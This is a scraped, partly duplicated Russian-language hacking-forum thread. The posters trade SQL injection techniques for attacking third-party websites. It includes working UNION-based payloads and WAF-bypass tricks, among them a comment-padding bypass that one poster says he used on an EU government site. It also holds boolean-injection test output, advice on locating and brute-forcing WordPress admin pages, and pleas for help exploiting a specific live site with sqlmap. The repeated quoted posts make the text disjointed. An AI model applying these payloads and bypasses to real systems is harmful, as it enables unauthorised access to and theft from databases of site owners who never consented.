Кстати, вот всегда было интересно, как определить на что именно триггерется ваф?CONCAT, UNION, ALL, SELECT, NULL
Кстати, вот всегда было интересно, как определить на что именно триггерется ваф?CONCAT, UNION, ALL, SELECT, NULL
Можешь взять список всех сайтов нужной доменной зоны и написать whois чекер, который распарсит тебе данные по времени регистрации домена.Существует ли способ, как находить старые и/или непопулярные сайты, т.к они более уязвимые (гугл дорки не в счет). Хочется немного практики. Для новых и поплуярных, что выдает гугл, не хватает знаний.
Кстати, вот всегда было интересно, как определить на что именно триггерется ваф?
' UNION ALL SELECT NULL,VERSION(),NULL,NULL --
id=1' /*!55431%55NiOn*/
Одно из лучший обьяснений, спасибо!!!Я например делаю так, есть такой запрос в параметре id=1 на который сервер отвечает кодом 403:
Код:' UNION ALL SELECT NULL,VERSION(),NULL,NULL --
Поочередно начинаешь формировать его таким образом:
id=1' (подставил кавычку и смотришь отдает 403 или нет, если нет то идешь дальше)
id=1' UNION (тоже самое, если не отдает 403 то идешь дальше)
id=1' UNION ALL (тоже самое, если не отдает 403 то идешь дальше)
А когда находишь слово(а) или символ который фильтруются то составляешь запрос с байпасом, например видишь что стриггерилось на UNION, то делаешь например такой запрос с комментом:
Код:id=1' /*!55431%55NiOn*/
И идешь дальше, если триггера нет. Если же триггерится на такое, то подбираешь другой пэйлоад. Ну может кто-то по другому ищет, я руками дотошно сижу кручу-верчу.
Кста, пару лет назад на крупном eu gov сайте ни как не мог понять в чем дело и не мог обойти ваф, дня 3 сидел возился с ним, оказалось что в параметре фильтруются именно первые 50 символов, и оно обходилось так (добавлением коммента с пятидесятью цифрами в самом начале запроса): id=1'%20/*11111111111111111111111111111111111111111111111111111*/%20union%20all%20select%20null и так далее. Экспериментировать кароч надо.
Например blog.site.com/wp-adminЕсли в БД есть таблицы с назаниями wp_users, wp_config и тому подобные, можно сделать вывод что сайт работает на WordPress?
Перепробовал кучу поисковиков админок но никак не могу найти страницу входа в админку, какие направления можно еще посмотреть чтобы найти ее?
Все стандартные названия перепробовал, может есть какой то сильный инструмент для брута?Например blog.site.com/wp-admin
Либо может другой поддомен
burpВсе стандартные названия перепробовал, может есть какой то сильный инструмент для брута?
Если в БД есть таблицы с назаниями wp_users, wp_config и тому подобные, можно сделать вывод что сайт работает на WordPress?
Перепробовал кучу поисковиков админок но никак не могу найти страницу входа в админку, какие направления можно еще посмотреть чтобы найти ее?
Где посмотреть известные уязвимости тем и плагинов на вордпресс
<?php if(isset($_GET['qweasd'])) { die("qweasd");}?>
<?php //004fb
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));
Тут все что угодно может быть, причин масса, почему мап не детектит. Можешь залить сайт под хайд, я чекну - в таком случае не забудь Request/Response от окуня приложить. В личку только прошу не ломиться, там не отвечаю.Видишь скулю?
Нет
А она есть....
-------------------------------------------------------------------------------------------
URL encoded GET input id was set to -1' OR 321=6 AND 000739=000739 --
Tests performed:
-1' OR 2+739-739-1=0+0+0+1 -- => TRUE
-1' OR 3+739-739-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+739-739) -- => FALSE
-1' OR 3*2>(0+5+739-739) -- => FALSE
-1' OR 2+1-1+1=1 AND 000739=000739 -- => FALSE
-1' OR 3*2=5 AND 000739=000739 -- => FALSE
-1' OR 3*2=6 AND 000739=000739 -- => TRUE
-1' OR 3*2*0=6 AND 000739=000739 -- => FALSE
-1' OR 3*2*1=6 AND 000739=000739 -- => TRUE
Original value: NormalValue
Proof of Exploit
SQL query - SELECT database()
dbname (точно точно там дб нэйм , такое не придумаешь)
-----------------------------------------------------------------------------------------------------------------
Мапа не раскручивает... окунь как понимаю не юзая никакие тамперы, хексы, ноу-касты, и прочее - но до дб добрался легко.
Наблюдал долго через v5 за всем этим делом --
1 . пэйлоада подобного не увидел. никогда значение NormalValue параметра id не было изменено на -1, как в пэйлоаде .
После знаков -- в пэйлоаде мапа норовит что-то дописать. В успешном варианте , пробившемся - пустота
Пробовал всё почти. -r -u -tampers -hex -no-cast -random-agent and etc etc. But no result.
Вопрос 1
Могу вручную в запросе выставить подходящее значение -1 , но будет ли это нормально?- без оригинального значения и тд. Мапа пишем сама мол не балуйся, ставь ориджинал.
Вопрос 2 - как с помощью sufix , prefix, или стринг string - использовать именно этот/эти пэйлоады - трушные так сказать. (они ж True) . А не лить по 8к реквестов . С одного бы залететь.
Путь к уязе очень прост. www.site.com/?id=NormalValue. Помогите раскрутить плз)
Вопрос 3 как прописать эти пэйлоады кастомно . по типу --- https://github.com/sqlmapproject/sqlmap/issues/4091 (другая история) . Не очень шарю в этом пэйлоадобилдерстве. Скрипткидди ибо ( но понять хочу!
Всем хорошего дня.
Попробуй через --string прописать строку для определения TRUE или чере --not-string для FALSE. Иногда sqlmap не находит различий между ними, если ему явно не указатьВидишь скулю?
Нет
А она есть....
-------------------------------------------------------------------------------------------
URL encoded GET input id was set to -1' OR 321=6 AND 000739=000739 --
Tests performed:
-1' OR 2+739-739-1=0+0+0+1 -- => TRUE
-1' OR 3+739-739-1=0+0+0+1 -- => FALSE
-1' OR 3*2<(0+5+739-739) -- => FALSE
-1' OR 3*2>(0+5+739-739) -- => FALSE
-1' OR 2+1-1+1=1 AND 000739=000739 -- => FALSE
-1' OR 3*2=5 AND 000739=000739 -- => FALSE
-1' OR 3*2=6 AND 000739=000739 -- => TRUE
-1' OR 3*2*0=6 AND 000739=000739 -- => FALSE
-1' OR 3*2*1=6 AND 000739=000739 -- => TRUE
Original value: NormalValue
Proof of Exploit
SQL query - SELECT database()
dbname (точно точно там дб нэйм , такое не придумаешь)
-----------------------------------------------------------------------------------------------------------------
Мапа не раскручивает... окунь как понимаю не юзая никакие тамперы, хексы, ноу-касты, и прочее - но до дб добрался легко.
Наблюдал долго через v5 за всем этим делом --
1 . пэйлоада подобного не увидел. никогда значение NormalValue параметра id не было изменено на -1, как в пэйлоаде .
После знаков -- в пэйлоаде мапа норовит что-то дописать. В успешном варианте , пробившемся - пустота
Пробовал всё почти. -r -u -tampers -hex -no-cast -random-agent and etc etc. But no result.
Вопрос 1
Могу вручную в запросе выставить подходящее значение -1 , но будет ли это нормально?- без оригинального значения и тд. Мапа пишем сама мол не балуйся, ставь ориджинал.
Вопрос 2 - как с помощью sufix , prefix, или стринг string - использовать именно этот/эти пэйлоады - трушные так сказать. (они ж True) . А не лить по 8к реквестов . С одного бы залететь.
Путь к уязе очень прост. www.site.com/?id=NormalValue. Помогите раскрутить плз)
Вопрос 3 как прописать эти пэйлоады кастомно . по типу --- https://github.com/sqlmapproject/sqlmap/issues/4091 (другая история) . Не очень шарю в этом пэйлоадобилдерстве. Скрипткидди ибо ( но понять хочу!
Всем хорошего дня.
пробовал , и --test-filter под OR AND врубалПопробуй через --string прописать строку для определения TRUE или чере --not-string для FALSE. Иногда sqlmap не находит различий между ними, если ему явно не указать
Тут все что угодно может быть, причин масса, почему мап не детектит. Можешь залить сайт под хайд, я чекну - в таком случае не забудь Request/Response от окуня приложить. В личку только прошу не ломиться, там не отвечаю.